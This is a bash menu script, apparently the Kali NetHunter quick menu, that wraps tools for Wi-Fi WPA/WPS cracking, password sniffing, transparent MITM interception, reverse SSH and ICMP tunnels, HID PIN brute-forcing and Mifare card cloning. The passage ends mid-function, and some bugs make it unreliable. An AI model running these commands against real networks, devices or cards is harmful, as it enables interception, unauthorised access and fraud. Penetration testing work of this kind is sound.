#!/bin/bash

## date format ##
NOW=$(date +"%m-%d-%y-%H%M%S")
DEVICE=$(cat /system/build.prop | grep -E 'product.device=' | cut -d"=" -f2)
########################## QUICK MENU ###############################
f_interface(){
clear
echo "			KALI NETHUNTER QUICK MENU"
echo ""
echo ""
echo "[1]	Wireless Attacks	[6]	Exploit Tools"
echo "[2]	Sniffing/Spoofing	[7]	OpenVPN Setup"
echo "[3]	Reverse Shells		[8]	VNC Setup"
echo "[4]	Info Gathering		[9]	Log/Capture Menu"
echo "[5]	Vulnerability Scan	[10]	USB Attacks"
echo "[11]	NFC Attacks"
echo ""
echo "[12]	Settings		[14]	Monitor Mode"
echo "[13]	Services		[15]	Eject USB Wifi"
echo ""
echo "[q]	Exit To Command Line"
echo ""

# wait for character input

read -p "Choice: " menuchoice

case $menuchoice in

1) clear; f_wireless_attacks ;;
2) clear; f_sniffing ;;
3) clear; f_reverse ;;
4) clear; f_information_gathering ;;
5) clear; f_vulnerability ;;
6) clear; f_exploitation ;;
7) clear; f_vpnmenu ;;
8) clear; f_vncmenu ;;
9) clear; f_capture ;;
10) clear; f_usb;;
11) clear; f_nfcmenu ;;
12) clear; f_settings ;;
13) clear; f_services ;;
14) clear; f_mon;;
15) clear; f_safeeject;;
q) clear; exit 1 ;;
*) echo "Incorrect choice..." ;
esac
}

########################## WIRELESS MENU ###############################
f_wireless_attacks(){
clear
f_wlan1check
echo "				WIRELESS ATTACKS MAIN MENU"
echo ""
echo ""
echo "[1]	Wifite - Automated Wireless Auditor"
echo "[2]	Kismet - Wireless network detector, sniffer, IDS"
echo "[3]	AP F**ker - Wireless attack multitool"
echo "[4]	Wash -  Scan for WPS enabled routers"
echo "[5]	Airodump-ng - Display all wireless networks/clients"
echo "[6]	Pingen - Calculate default WPS PINs for some D-Link routers "
echo ""
echo "[0]	Exit"
echo ""
read -p "Choice: " wirelesschoice

case $wirelesschoice in

1) clear; f_wifite;;
2) clear; f_kismet;;
3) clear; f_apfucker;;
4) clear; trap 'f_wireless_attacks' 2 ;f_monitor_check; wash -i mon0;;
5) clear; trap 'f_wireless_attacks' 2 ;f_monitor_check; airodump-ng mon0;;
6) clear; trap 'f_wireless_attacks' 2 ;f_pingen;;
0) clear; f_interface;;
*) echo "Incorrect choice...";
esac
}

f_wlan1check(){
adaptor=`ip addr | grep wlan1`
if [ -z "$adaptor" ]; then
    ifconfig wlan1 up
    sleep 2
    echo "Attempting to bring wlan1 up"
    if [ -z "$adaptor" ]; then
    	echo "Still not detecting wlan1, please try plugging it in again."
    	sleep 5
    	clear
    	echo -e "\e[31mWLAN1: NOT FOUND\e[0m"
    	echo ""
    fi
else
	echo -e "\e[92mWLAN1: FOUND\e[0m"
	echo ""
fi
}

f_monitor_check(){
monstat='grep "mon0" /proc/net/dev'
monstat2='grep "wlan1mon" /proc/net/dev'

if [ -n "$monstat" ] || [ -n "$monstat2" ]; then
    clear
else
	ifconfig wlan1 up
	wlanstat='grep "wlan1" /proc/net/dev'
	    if  [ -n "$wlanstat" ] ; then
	    	airmon-ng start wlan1
	    else
		    echo "You must plug in a compatible Wi-Fi card to use this feature."
		    echo ""
		    read -p "Press [Enter] to return to the main menu." null
		    clear
		    f_wireless_attacks
		fi
fi
}

f_wifite(){
cd /captures/wifite
while :
do
clear
echo ""
echo "* WIFITE QUICK SELECT *"
echo ""
echo "[1] Regular Wifite"
echo "[2] Attack all WEP"
echo "[3] Capture all WPA and crack (WARNING: can cause overheating + power loss)"
echo "[4] Capture all WPA"
echo "[5] Attack WPS with power over 40+"
echo ""
echo "[0] Exit to Wireless Attack Menu"
echo ""
echo -n "Enter your menu choice [1-3]: "
read yourch
case $yourch in
1) clear; wifite ;;
2) clear; wifite -all -wep ;;
3) clear; wifite -all -wpa -dict /opt/dic/89.txt ;;
4) clear; wifite -all -wpa -dict none ;;
5) clear; wifite -p 40 -wps ;;
0) clear; f_wireless_attacks ;;
*) echo "Incorrect choice..." ;
echo "Press Enter to continue. . ." ; read ;; esac
done
}

f_kismet_save(){
if [ -d "/sdcard/kali-nh/captures/" ]; then
	echo "Detected kali-nh capture folder, moving capture files"
	mkdir -p /sdcard/kali-nh/captures/kismet
	cd /sdcard/kali-nh/captures/kismet/
	zip -rj "kismet-captures-$NOW.zip" /captures/kismet/Kismet-$NOW*
	echo "Successfully copied to /sdcard/kali-nh/captures/kismet-captures-$NOW.zip"
	sleep 3
else
	cd /sdcard/
	zip -rj "kismet-captures-$NOW.zip" /captures/kismet/Kismet-$NOW*
	echo "Successfully copied to /sdcard/kismet-captures-$NOW.zip"
	sleep 3
fi
# option to erase files
read -p "Would you like to secure erase all files in Kismet /captures folder and database? (y/n): " ERASEKISMET
if [ "$ERASEKISMET" == "y" ]; then
	echo "Removing capture files..."
	wipe -f -i -r /captures/kismet/*
	wipe -f -i -r /captures/kismet_db/*
fi
}

f_kismet(){
echo "Make sure BlueNMEA is running before starting with GPS support"
sleep 3
read -p "Would you like to run Kismet with GPS enabled? (y/n)" CONT
if [ "$CONT" == "y" ]; then
	(socat TCP:127.0.0.1:4352 PTY,link=/tmp/gps & gpsd /tmp/gps) & kismet -g -t Kismet-$NOW;
	killall gpsd
	f_giskismet;
	wipe -f -P 5 /tmp/gps
	clear
	f_wireless_attacks;
else
  echo "Running Kismet WITHOUT GPS support..."
  sleep 2
  kismet -g -t Kismet-$NOW;
  # save kismet files
  f_kismet_save
  clear
  f_wireless_attacks;
fi
}

f_giskismet(){
clear
# create database folder or check if one exsists
if [ ! -d "/captures/kismet_db" ]; then
	mkdir -p "/captures/kismet_db"
fi
# process all netxml files (duplicated are ignored)
cd /captures/kismet/
for capture in $(find . -iname '*.netxml'); do
	echo "Adding $capture to datbase"
	sleep 5
	giskismet -x "$capture" --database "/captures/kismet_db/wireless.dbl"
done
# export kml of all wireless data and copy files to sdcard
giskismet --database "/captures/kismet_db/wireless.dbl" -q "select * from wireless" -o "/captures/kismet/kismet-$NOW.kml"
echo "Created kismet-$NOW.kml file for Google Earth"
# save kismet files
f_kismet_save
 "All files copied successfully!";
}

f_apfucker(){
  f_monitor_check
  python /usr/bin/apfucker.py
  clear
  f_wireless_attacks
}

f_pingen(){
clear
read -p "Enter MAC address (BSSID) of DLINK router: " DLINKMAC
pingen $DLINKMAC
read -p "Would you like to try pin in reaver against BSSID? (y/n) : " dlinkpinopt
if [ "$dlinkpot" == "y"]; then
		read -p "Enter pin generated from pingen (above pin): " dlinkpin
		f_monitor_check
		reaver -i mon0 -b $DLINKMAC -p $dlinkpin
		read -p "Press [Enter] key to continue..."
		f_wireless_attacks
	else
		f_wireless_attacks
fi
}

##########################   SNIFFING MENU     ###############################
f_sniffing(){
clear
echo "				SNIFFING/SPOOFING MAIN MENU"
echo ""
echo ""
echo "[1]	tcpdump - Dump network traffic"
echo "[2]	tshark - Dump and analyze network traffic"
echo "[3]	urlsnarf - URL sniffer"
echo "[4]	dsniff - Plain text password sniffer"
echo "[5]	MITMproxy - Capture HTTP and HTTPS as a transparent proxy"
echo ""
echo "[0]	Exit to main menu"
echo ""
read -p "Choice: " sniffchoice

case $sniffchoice in

1) clear; trap 'f_sniffing' 2; f_tcpdump ;;
2) clear; trap 'f_sniffing' 2; f_tshark ;;
3) clear; trap 'f_sniffing' 2; f_urlsnarf ;;
4) clear; trap 'f_sniffing' 2; f_dsniff ;;
5) clear; trap 'f_sniffing' 2; f_mitmproxy ;;
0) clear; f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_tcpdump(){
	f_pick_interface
	echo "ctrl-c to quit and return to sniffing menu"
	tcpdump -i $pickinterface -w /captures/tcpdump/tcpdump-$NOW.cap;
	f_sniffing
}
f_tshark(){
	f_pick_interface
	echo "ctrl-c to quit and return to sniffing menu"
	tshark -i $pickinterface -w /captures/tshark/tshark-$NOW.cap;
	f_sniffing
}
f_urlsnarf(){
	f_pick_interface
	echo "ctrl-c to quit and return to sniffing menu"
	urlsnarf -i $pickinterface > /captures/urlsnarf/urlsnarf-$NOW.log
	f_sniffing
}
f_dsniff(){
	f_pick_interface
	echo "ctrl-c to quit and return to sniffing menu"
	dsniff -i $pickinterface  -w /captures/dsniff/urlsnarf-$NOW.cap;
	f_sniffing
}

f_mitmproxy(){
mitmlog=/captures/mitmproxy/mitmlog_$NOW
ip_proxy=$(/sbin/ifconfig wlan0 | awk -F ' *|:' '/inet addr/{print $4}')

mkdir -p /captures/mitmproxy
echo "Flushing iptables"
iptables --flush
echo "Enabling transparent proxy on wlan0"
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
LANG=en_US.UTF-8
echo "Instructions:"
echo "Starting MITM proxy in transparent mode on wlan0 > writing to $mitmlog"
echo "IPtables is redirecting port 80 and 443 to port 8080"
echo "Configure the client to use $ip_proxy as the default gateway"
echo "Open the magic domain mitm.it and install the certificate on client computer."
echo ""
read -p "Press [enter] to continue..."
#LANG=en_US.UTF-8 mitmproxy -T --host -w $mitmlog
mitmproxy -T --host -w $mitmlog
# flush iptables when finished
iptables --flush
f_sniffing
}
########################## INFO GATHER MENU ##############################

f_information_gathering(){
clear
echo "		INFORMATION GATHERING MAIN MENU"
echo ""
echo ""
echo "[1]	Spiderfoot - Footprinting Tool"
echo "[2]	Recon-ng - Web Reconnaissance Framework"
echo "[3]	Device-pharmer - Search Shodan using API (requires API key)"
echo ""
echo "[0]	Exit to main menu"
echo ""
read -p "Choice: " infochoice

case $infochoice in
1) clear; trap 'f_information_gathering' 2; f_spiderfoot;;
2) clear; recon-ng; f_information_gathering;;
3) clear; f_device_pharmer ;;
0) clear; f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_spiderfoot(){
cd /opt/spiderfoot/ && python /opt/spiderfoot/sf.py
}

f_device_pharmer(){
if [ ! -f "/usr/bin/device-pharmer" ]; then
	read -p "Device-pharmer was not found, would you like to download? (y/n) : " devicepharmer
		if [ "$devicepharmer" == "y" ]; then
			apt-get update && apt-get install -y device-pharmer
		else
			echo "Cancelled download returning to information gathering menu"
			sleep 3
			f_information_gathering
		fi
fi
if grep -q "ENTER YOUR API KEY HERE AND KEEP THE QUOTES" /usr/bin/device-pharmer;
	then
		echo "Device-pharmer requires a Shodan API key which was not found."
		read -p "Would you like to add your Shodan API key now? (y/n) : " shodanyesorno
		if [ "$shodanyesorno" == "y" ]; then
			read -p "Enter your Shodan API key : " shodanapikey
			sed -i 's/ENTER YOUR API KEY HERE AND KEEP THE QUOTES/'$shodanapikey'/g' /usr/bin/device-pharmer
			chmod +x /usr/bin/device-pharmer
		else
			echo "Cancelled.  Returning back to information gathering menu."
			f_information_gathering
		fi
else
	echo "Shodan API key found!"
fi

read -p "Enter your Shodan search term : " shodan search
read -p "Would you like to use a proxy? (y/n) " shodanproxyyesorno
if [ $shodanproxyyesorno == "y" ]; then
	read -p "Enter your proxy address: " shodanproxyadd
	shodanproxy="--proxy $shodanproxyadd"
else
	shodanproxy=""
fi
# Begin device-pharmer
clear
device-pharmer -s '$shodan_search' -ssl $shodanproxy
read -p "Press enter to return to information gathering menu..."
f_information_gathering
}

########################## VULNERABILITY MENU ###########################
f_vulnerability(){
if [ ! -d "/var/lib/openvas/" ]; then
	clear
	echo "OpenVAS is not currently installed.  The installation can take a few hours."
	read -p "Would you like to install OpenVAS (1GB+ space needed)? (y/n): " installopenvas
		if [ "$installopenvas" == "y" ]; then
			apt-get update
			apt-get dist-upgrade
			apt-get install -y openvas
			openvas-setup
		fi
fi
clear
echo "				VULNERABILITY MENU"
echo ""
echo ""
echo "[1] Start OpenVAS (https://127.0.0.1:9392/)"
echo "[2] Stop OpenVAS"
echo "[3] Update OpenVAS Feeds"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " vulnchoice

case $vulnchoice in
1) clear; openvas-start; f_vulnerability ;;
2) clear; openvas-stop; f_vulnerability ;;
3) clear; openvas-feedupdate; f_vulnerability ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}
########################## EXPLOITATION MENU ############################

f_exploitation(){
clear
echo "				EXPLOITATION MAIN MENU"
echo ""
echo ""
echo "[1]	Metasploit-Framework"
echo "[2]	BeEF-XSS"
echo "[3]	Social-Engineering Toolkit (SET)"
echo ""
echo "[0]	Exit to main menu"
echo ""
read -p "Choice: " webchoice

case $webchoice in
1) clear; echo "msfconsole may take up to 5 minutes to load, please wait..."; service postgresql start; msfdb init; msfconsole; f_exploitation ;;
2) clear; service beef-xss start; echo "Open browser to http://127.0.0.1:3000/ui/panel (beef/beef)"; sleep 8; f_exploitation ;;
3) clear; setoolkit ; f_exploitation ;;
4) clear; trap 'f_exploitation' 2; f_mitmf ;;
0) clear; f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

########################## REVERSE MENU ################################
f_reverse(){
echo "				REVERSE SHELLS"
echo ""
echo ""
echo "[1] Setup AutoSSH"
echo "[2] Start AutoSSH"
echo ""
echo "[3] Start pTunnel - (TCP over ICMP)"
echo "[4] Stop pTunnnel"
echo ""
#echo "[5] Start iodine (DNS Tunnel)"
#echo "[6] Stop iodine"
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " serviceschoice

case $serviceschoice in
1) clear; f_autossh ;;
2) clear; f_start_autossh ;;
3) clear; f_ptunnel ;;
4) clear; echo "Attempting to shutdown ptunnel" ; kill -KILL $(cat /opt/ptunnel.pid) ; sleep 5 ;;
#5) clear; f_iodine ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_autossh(){
clear
if [ -e "/root/.ssh/auto_id_rsa" ]; then
        echo "SSH keys found at /root/.ssh/auto_id_rsa"
        read -p "Would you like to generate new SSH keys? (y/n):" autossh_new_keys
        if [ "$autossh_new_keys" == "y" ]; then
        	rm -rf /root/.ssh/auto_id*
        	f_generate_autossh_keys
        fi
else
	echo "KEY AUTO_ID_RSA NOT FOUND: Generate new SSH keys?"
	f_generate_autossh_keys
fi

	f_generate_autossh_keys()
	{
		echo "Generating new keys"
		chmod 700 /root/.ssh
		ssh-keygen -b 1024 -N '' -f /root/.ssh/auto_id_rsa -t rsa -q
		chmod 600 /root/.ssh/auto_id_rsa
		chmod 644 /root/.ssh/auto_id_rsa.pub
		sleep 4
	}

read -p "Copy keys to remote (middle) server? (y/n): " copykeymiddle
if [ "$copykeymiddle" == "y" ]; then
		echo "Enter remote host connection details:"
		echo ""
		read -p "Enter remote server username: " -e -i "root" amu
		read -p "Enter remote server address (ip/domain): " amh
		read -p "Enter remote server port: " -e -i "22" amp
		ssh-copy-id -i /root/.ssh/auto_id_rsa.pub "-p $amp $amu@$amh"
fi
f_reverse
}

f_start_autossh(){
#
# For help setting up autossh, I utilized the guide here:
# https://raymii.org/s/tutorials/Autossh_persistent_tunnels.html
#
clear
if [ -e "/root/autossh_config" ]; then
	read -p "Use previous autossh configuration? (y/n): " autossh_previous
		if [ "$autossh_previous" == "y" ]; then
			echo "Starting autossh..."
			/root/autossh_config
			f_reverse
		fi
	else
	read -p "Would you like to remove previous configuration? (y/n): " autossh_remove
		if [ "autossh_remove" == "y" ]; then
			rm -rf /root/autossh_config
		fi
fi
clear
read -p "Enter local autossh monitoring port: " -e -i "1010" autossh_local_port
read -p "Enter local autossh reverse tunnel port: " -e -i "6666" autossh_forward_port
read -p "Enter remote server username: " -e -i "root" amu
read -p "Enter remote server address (ip/domain): " amh
read -p "Enter remote server port: " -e -i "22" amp
echo ""
echo "Starting autossh..."
autossh -M $autossh_local_port -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/auto_id_rsa -R $autossh_forward_port:localhost:22 $amu@$amh -p $amp
echo "You can now access this Android device from the remote server using:"
echo "ssh -p $autossh_forward_port $amu@127.0.0.1"
sleep 8
clear
echo "*** The following file will not be secure and will contain server/username information ***"
echo ""
read -p "Would you like to save configuration as an executable file? (y/n): " autossh_file
	if [ "$autossh_file" == "y"]; then
		echo "autossh -M $autossh_local_port -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/auto_id_rsa -R $autossh_forward_port:localhost:22 $amu@$amh -p $amp" > /root/autossh_config
		chmod +x /root/autossh_config
		echo "File saved to /root/autossh_config"
		sleep 5
	fi
f_reverse
}

f_ptunnel(){
	echo "Pick interface to start ptunnel on"
	sleep 3
	f_pick_interface
	clear
	echo "P(ing)tunnel allows you to tunnel TCP connections over ICMP "
	echo "It requires a server running ptunnel with a password set."
	echo "The ptunnel server will then connect to a SSH server. e.g.:"
	echo "Your Device (localhost) <> Ptunnel Proxy Server <> SSH Server"
	echo ""
	read -p "pTunnel server password: " ptunpassword
	read -p "pTunnel server address: " pserver
	read -p "SSH Server address/name you wish to connect to: " pdest
	read -p "SSH server port: " -e -i "22" pport
	# iptables
	#iptables -F
	#iptables -P INPUT ACCEPT
	#iptables -A INPUT -i lo -j ACCEPT
	#iptables -A INPUT -p icmp -j ACCEPT
	#iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
	#iptables -A INPUT -j DROP
	ptunnel -p $pserver -lp 8000 -da $pdest -dp $pport -x $ptunpassword -c $pickinterface -daemon /opt/ptunnel.pid &
	clear
	echo "Some example connections to $pserver:"
	echo "ssh -p 8000 localhost"
	echo "sftp -P 8000 localhost"
	sleep 3
f_reverse
}

#f_iodine(){
#	clear
#	echo "Iodine allows you to tunnel traffic through DNS."
#	echo "It must be running on a server with a domain and"
#	echo "DNS records setup properly."
#	echo ""
#	read -p "iodine server password: " iopassword
#	read -p "pTunnel server address: " ioservername
#	iodine -F /opt/iodine.pid -P $iopassword $ioservername
#	sleep 3
#f_reverse
#}

########################## SERVICES MENU ###############################
f_services(){
clear
echo "				SERVICES"
echo ""
echo ""
echo "[1] Start VNC Server"
echo "[2] Stop VNC Server"
echo ""
echo "[3] Start OpenVPN Server"
echo "[4] Stop OpenVPN Server"
echo ""
echo "[5] Start XServer on localhost (Android Application XServer XSDL)"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " serviceschoice

case $serviceschoice in
1) clear; f_vncstart ;;
2) clear; f_vnckill ;;
3) clear; f_startvpn ;;
4) clear; service openvpn stop ; iptables -F ; iptables -X ; echo "Stopping OpenVPN" ;;
5) clear; DISPLAY=127.0.0.1:0.0 startxfce4; echo "Server started on localhost to be used with Xserver XSDL application" ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_vncstart(){
clear
if [ ! -e "/etc/vnc.conf" ]; then
	echo "VNC Configuration file not found in /etc/vnc.conf"
	echo "Please run VNC Setup before starting VNC."
	sleep 5
	f_vncmenu
fi
echo "VNC START MENU"
echo ""
echo "[1] Start VNC on all interfaces"
echo "[2] Start VNC on localhost only"
echo ""
echo "[0] Exit to main menu"
echo ""
echo -n "Enter your menu choice [1-5]: "
read -p "Choice:" vncmenustart

case $vncmenustart in
1) clear ; f_vnc_allint ;;
2) clear ; f_vnc_local ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_vnc_allint(){
vncserver
echo "Display Number :X will be port 590X."
read -p "Press any key to continue..."
f_interface
}

f_vnc_local(){
vncserver -localhost -nolisten tcp
echo "Display Number :X will be port 590X."
read -p "Press any key to continue..."
f_interface
}

f_vnckill(){
	echo "Removing all PID and log files from /root/.vnc/"
	echo "Killing all VNC process ID's"
	sleep 2
	kill $(ps aux | grep 'Xtightvnc' | awk '{print $2}')
	echo "Removing PID files"
	sleep 2
	vncdisplay=$(ls ~/.vnc/*.pid | sed -e s/[^0-9]//g)
	for x in $vncdisplay; do tightvncserver -kill :$x; done;
	echo "Removing log files"
	sleep 2
	rm /root/.vnc/*.log;
	echo "Removing lock file"
	sleep 2
	rm -r /tmp/.X*
	echo "All VNC process/logs have hopefully been removed"
	sleep 3
	f_services
}
########################## VPN MENU ###############################
f_vpnmenu(){
clear
echo "				OPENVPN MAIN MENU"
echo ""
echo ""
echo "[1] Generate VPN Server Keys *will remove previous old keys"
echo "[2] Generate Client Keys"
echo "[3] Export Client Keys to sdcard"
echo ""
echo "[0] Exit to Main Menu"
echo -n "Enter your menu choice [1-3]: "
read -p "Choice: " vpnkeychoice

case $vpnkeychoice in
1) f_server_key ;;
2) f_domain_clientkey ;;
3) f_exportkeys ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_server_key(){
cd /etc/openvpn
echo "Removing previous server..."
rm -rf easy-rsa
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 ./easy-rsa
cd easy-rsa
echo 'export EASY_RSA="/etc/openvpn/easy-rsa"' >> vars
source vars
./clean-all
./pkitool --initca
ln -s openssl-1.0.0.cnf openssl.cnf
echo "Building Server Certificates"
sleep 3
echo "Generating Certificate Authority Key..."
./build-ca OpenVPN
echo "Generating Server Key..."
./build-key-server server
echo "Generating client1 Key..."
./build-key client1
./build-dh
cd /etc/openvpn
echo "Creating configuration file in /etc/opevpn/openvpn.conf"
cat << EOF > /etc/openvpn/openvpn.conf
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nobody

server 10.8.0.0 255.255.255.0
# server and remote endpoints
ifconfig 10.8.0.1 10.8.0.2
keepalive 10 60
persist-key
persist-tun

log-append /var/log/openvpn
#status /var/log/openvpn-status.log
verb 5
client-to-client

push "redirect-gateway def1"
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"

script-security 3
comp-lzo
EOF
# RETURN TO VPN MENU
f_vpnmenu
}

f_domain_clientkey(){
clear
#PUBLIC_IP=$(curl www.icanhazip.com)
#echo "Your current ip is: $PUBLIC_IP"
#echo ""
read -p "Enter custom domain/IP/dynamic IP (e.g. your public/local ip): " DOMAIN_IP
cat << EOF > /etc/openvpn/easy-rsa/keys/kaliserver.ovpn
dev tun
client
proto udp
remote $DOMAIN_IP 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3
EOF
echo "Finished. Client key created at /etc/openvpn/easy-rsa/keys/kaliserver.ovpn"
sleep 5
# RETURN TO VPN MENU
f_vpnmenu
}

f_exportkeys(){
echo "Zipping client keys to /sdcard/openvpn-kaliserver-clientcert.zip"
sleep 5
cd /etc/openvpn/easy-rsa/keys/
zip -r6 /sdcard/kali-nh/openvpn-kaliserver-clientcert.zip ca.crt ca.key client1.crt client1.csr client1.key kaliserver.ovpn #openvpn-keys.tgz
echo "If you received an error things may have gone wrong when generating a certificate..."
sleep 6
# RETURN TO VPN MENU
f_vpnmenu
}

f_startvpn(){
if [ ! -e "/etc/openvpn/openvpn.conf" ]; then
	echo "Default openvpn configuration was not found in /etc/openvpn/openvpn.conf:"
	echo "Please use OpenVPN Setup from main menu."
	sleep 3
	f_vpnmenu
fi
echo "Starting OpenVPN"
sleep 3
# Flush iptables
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
# Start iptables
iptables -A INPUT -i tun+ -j ACCEPT
iptables -A FORWARD -i tun+ -j ACCEPT
iptables -A FORWARD -s 10.8.0.0/24 -j ACCEPT
iptables -A FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o wlan0 -j MASQUERADE
service openvpn start
echo "OpenVPN started"
sleep 5
f_vpnmenu
}

########################## VNC MENU ###############################
f_vncmenu(){
clear
echo "				VNC SETTINGS"
echo ""
echo "[1] Add/change VNC Password"
echo "[2] Set VNC default resolution"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " vncsettingschoice

case $vncsettingschoice in
1) clear; echo "Change your VNC password:"; vncpasswd; f_vncmenu ;;
2) clear; f_vncres ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_vncres(){
if [ "$DEVICE" == "hammerhead" ]; then
	vncres="1920x1080"
elif [ "$DEVICE" == "flo" ] || [ "$DEVICE" == "deb" ]; then
	vncres="1920x1200"
elif [ "$DEVICE" == "grouper" ] || [ "$DEVICE" == "tilapia" ]; then
	vncres="1280x1024"
elif [ "$DEVICE" == "manta" ]; then
	vncres="2650x1600"
elif [ "$DEVICE" == "mako" ]; then
  vncres="1280x768"
elif [ "$DEVICE" == "shamu" ]; then
  vncres="2560x1440"
elif [ "$DEVICE" == "flounder" ]; then
  vncres="2048x1536"
elif [ "$DEVICE" == "A0001 - bacon" ]; then
  vncres="1920x1080"
else
  DEVICE="unknown device"
  vncres="1920x1080"
fi

echo ""
echo "Detected ${DEVICE}: will set resolution to ${vncres} in /etc/vnc.conf "
echo ""
read -p "Would you like to set a different resolution? (y/n): " -e -i "n" customvncres
if [ $customvncres == "y" ]; then
	read -p "Enter custom display size (e.g. 1920x1080): " vncres
fi

cat << EOF > /etc/vnc.conf
\$geometry ="$vncres";
\$depth = "24";
EOF
clear
echo "Configuration file created at /etc/vnc.conf:"
echo "============================================"
cat /etc/vnc.conf
sleep 7
f_vncmenu
}

########################## CAPTURE MENU ###############################
f_capture(){
clear
echo "				LOG/CAPTURE MENU"
echo ""
echo "[1] Sync all captures to SDCARD"
echo "[2] Wipe all captures on local device"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " logchoice

case $logchoice in
1) clear; f_sync_cap ;;
2) clear; f_wipe_cap ;;
0) f_interface ;;
*) echo "Incorrect choice..." ;
esac
}

f_sync_cap(){
if [ ! -d /sdcard/kali-nh/captures ]; then
	echo "Created folder /sdcard/kali-nh/captures"
	mkdir -p /sdcard/kali-nh/captures
fi
echo "Copying captures to /sdcard/kali-nh/captures..."
sleep 3
rsync -avOP /captures/ /sdcard/kali-nh/captures/
f_capture
}

f_wipe_cap(){
read -p "Are you sure you want to wipe all files in /captures? (y/n) : " wipecaptures
	if [ $wipecaptures == "y" ]; then
		find /captures -type f -exec wipe -f {} \;
		echo "Success! All files wiped in /captures"
		sleep 4
		f_capture
	else
		f_capture
	fi
}

############################# USB MENU #################################
f_usb(){
clear
echo "				USB ATTACKS MENU"
echo ""
echo "[1] Dictionary based brute force attack"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice:" usbchoice

case $usbchoice in
1) clear; f_hid_dic;;
0) f_interface;;
*) f_hid ;;
esac
}

f_hid_dic(){
clear
cd /opt/dic
echo "Pick a Dictionary: " dictselect
echo "[1] Common Passwords - Will brute-force common password followed by return key"
echo "[2] 4 digit PIN Numbers - Will brute-force 4 digit pins followed by return key"
echo ""
echo "[0] Back to HID Menu"
echo ""
read -p "Selection: " dictselect

case $dictselect in
	1) hid-dic 1; f_usb;;
	2) hid-dic 2; f_usb;;
	0) clear; f_usb;;
	*) clear; f_hid_dic;;
esac
}

########################## NFC MENU ###############################
f_nfcmenu(){
echo "                          NFC Attacks"
echo ""
echo ""
echo "Ensure that the built-in NFC device is disabled."
echo ""
echo "[1] Clone Mifare Card"
echo "[2] Write Mifare Card"
echo "[3] View Mifare Card Data"
echo ""
echo "[0] Exit to main menu"
echo ""
read -p "Choice: " nfcchoice

case $nfcchoice in
	1) clear; f_mifareclone ;;
	2) clear; f_mifarewrite ;;
	3) clear; nfc-list ; echo "" ; read -p "Press any key to return to the NFC menu." return ; clear ; f_nfcmenu ;;
	0) f_interface ;;
	*) clear; f_nfcmenu ;;
esac
}

f_mifareclone(){
# This script will automatically clone cards that are presented
# to the reader. If a card has already been cloned then the script we
# not try to clone the card again. If a card fails to clone (e.g., moved
# too far from reader) an error will be presented and the loop will
# restart. Tested using a SCL3711 usb dongle.

# Make sure the Mifare NFC tools are installed. If not, ask to install.
clear
if [ ! -e "/usr/bin/nfc-mfclassic" ]; then
	echo "[!] We need to install the following dependencies:"
	echo ""
	echo "libnfc5, libnfc-bin, and mfoc"
	echo ""
	read -p "Is this OK [Y/n]? " nfcinstall
	if [ "$nfcinstall" == "n" ] || [ "$nfcinstall" == "N" ]; then
		exit 0
	else
		clear
		apt-get update && apt-get install -y libnfc5 libnfc-bin mfoc
	fi
fi

# Set the date so that we can keep dumps organized.
DATE=$(date -u '+20%y%m%d-%H:%M:%S-UTC')
echo $DATE > /tmp/card-start.txt

START_TIME=$(cat /tmp/card-start.txt)
LOG_PATH="/root/cards/cards-$START_TIME"

# Create the log directory
mkdir -p $LOG_PATH
clear
echo "[*] Ready to clone... [*]"
echo ""

# Start the loop
while :
do
CARD=$(nfc-list | grep found | awk '/found/ {print $5}' | sed s/://g)

# Make sure we are only cloning a card once.
if [ "$CARD" == "found" ] ; then
	touch $LOG_PATH/cards.log
	NEW_CARD=$(nfc-list | grep UID | awk '/UID/ {print $3,$4,$5,$6}' | sed s/" "/:/g)
	echo $NEW_CARD > /tmp/card.log
	TEMP_CARD=$(cat /tmp/card.log)
	LOG_CARD=$(grep $TEMP_CARD $LOG_PATH/cards.log)

	if [ "$TEMP_CARD" == "$LOG_CARD" ]; then
		echo "[*] This card has already been cloned... [*]"
	else
		CTIME=$(date -u '+20%y%m%d-%H:%M:%S-UTC')
		mfoc -O $LOG_PATH/$CTIME-$TEMP_CARD.mfd

		# Ensure we got a good dump. If not loop back around.
		if [ -s $LOG_PATH/$CTIME-$TEMP_CARD.mfd ]; then
			echo ""
			echo "[*] Got it! Card dump is located: $LOG_PATH/$CTIME-$TEMP_CARD.mfd [*]"
			echo ""
			echo $NEW_CARD >> $LOG_PATH/cards.log
			echo "[*] Ready to clone... [*]"
			echo ""
		else
